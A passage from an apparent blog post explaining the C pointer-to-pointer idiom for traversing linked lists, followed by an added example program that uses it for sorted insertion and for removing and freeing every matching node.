<span style="font-family: Arial, Helvetica, sans-serif;"><span style="text-align: -webkit-auto;">describes the </span><tt style="text-align: -webkit-auto;">next</tt><span style="text-align: -webkit-auto;"> pointer of the </span><tt style="text-align: -webkit-auto;">struct list</tt><span style="text-align: -webkit-auto;"> which is pointed to by </span><tt style="text-align: -webkit-auto;">*lpp</tt><span style="text-align: -webkit-auto;">, that is, which is pointed to by the pointer which is pointed to by </span><tt style="text-align: -webkit-auto;">lpp</tt><span style="text-align: -webkit-auto;">. The expression</span></span><br />
<pre style="text-align: -webkit-auto;"><span style="font-family: Arial, Helvetica, sans-serif;"> lpp = &(*lpp)->next
</span></pre>
<span style="font-family: Arial, Helvetica, sans-serif;"><span style="text-align: -webkit-auto;">sets </span><tt style="text-align: -webkit-auto;">lpp</tt><span style="text-align: -webkit-auto;"> to point to the </span><tt style="text-align: -webkit-auto;">next</tt><span style="text-align: -webkit-auto;"> field of the </span><tt style="text-align: -webkit-auto;">struct list</tt><span style="text-align: -webkit-auto;"> pointed to by </span><tt style="text-align: -webkit-auto;">*lpp</tt><span style="text-align: -webkit-auto;">. In both cases, the parentheses around </span><tt style="text-align: -webkit-auto;">*lpp</tt><span style="text-align: -webkit-auto;"> are needed because the precedence of </span><tt style="text-align: -webkit-auto;">*</tt><span style="text-align: -webkit-auto;"> is lower than </span><tt style="text-align: -webkit-auto;">-></tt><span style="text-align: -webkit-auto;">.</span></span><br />
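<span style="font-family: Arial, Helvetica, sans-serif;">The pointer-to-pointer walk generalizes beyond deleting the first match. As an added example (not from the original post), the same idiom inserts into a sorted list and removes every matching node while freeing it, which the fragments above leave out; <tt>list_insert_sorted</tt>, <tt>list_remove_all</tt> and <tt>list_format</tt> are names chosen for this illustration.</span><br />

```c
/* Added example (not from the original post): the pointer-to-pointer
 * idiom applied to sorted insertion and delete-all-with-free. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

struct list {
    int item;
    struct list *next;
};

/* Insert i keeping ascending order. Returns 0, or -1 if malloc() fails. */
int list_insert_sorted(struct list **head, int i)
{
    struct list **lpp, *n;

    /* Stop at the pointer that should lead to the new node: either the
     * head pointer or some node's next field. No special case needed. */
    for (lpp = head; *lpp != NULL && (*lpp)->item < i; lpp = &(*lpp)->next)
        ;
    n = malloc(sizeof *n);
    if (n == NULL)
        return -1;
    n->item = i;
    n->next = *lpp;
    *lpp = n;
    return 0;
}

/* Remove and free every node holding i. Returns the number removed. */
int list_remove_all(struct list **head, int i)
{
    struct list **lpp = head;
    int removed = 0;

    while (*lpp != NULL) {
        if ((*lpp)->item == i) {
            struct list *dead = *lpp;
            *lpp = dead->next;  /* splice; lpp stays put so the successor
                                   is examined next (handles runs) */
            free(dead);         /* dead is never touched again */
            removed++;
        } else {
            lpp = &(*lpp)->next;
        }
    }
    return removed;
}

/* Write the items into buf as "1 2 3" and return buf. */
char *list_format(const struct list *lp, char *buf, size_t size)
{
    size_t used = 0;

    if (size == 0)
        return buf;
    buf[0] = '\0';
    for (; lp != NULL; lp = lp->next) {
        int n = snprintf(buf + used, size - used, used ? " %d" : "%d", lp->item);
        if (n < 0 || (size_t)n >= size - used)
            break;              /* output truncated: stop */
        used += (size_t)n;
    }
    return buf;
}

int main(void)
{
    struct list *l = NULL;
    int vals[] = { 3, 1, 2, 1, 3, 1 };   /* constructed sample input */
    char buf[64];

    for (size_t k = 0; k < sizeof vals / sizeof vals[0]; k++)
        if (list_insert_sorted(&l, vals[k]) != 0)
            return 1;
    printf("sorted:        %s\n", list_format(l, buf, sizeof buf));
    printf("removed %d ones\n", list_remove_all(&l, 1));
    printf("after removal: %s\n", list_format(l, buf, sizeof buf));
    list_remove_all(&l, 2);
    list_remove_all(&l, 3);
    return l == NULL ? 0 : 1;
}
```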
<span style="font-family: Arial, Helvetica, sans-serif;"><span style="text-align: -webkit-auto;"><br /></span></span></div>
Anonymoushttp://www.blogger.com/profile/18277613292156954188noreply@blogger.com0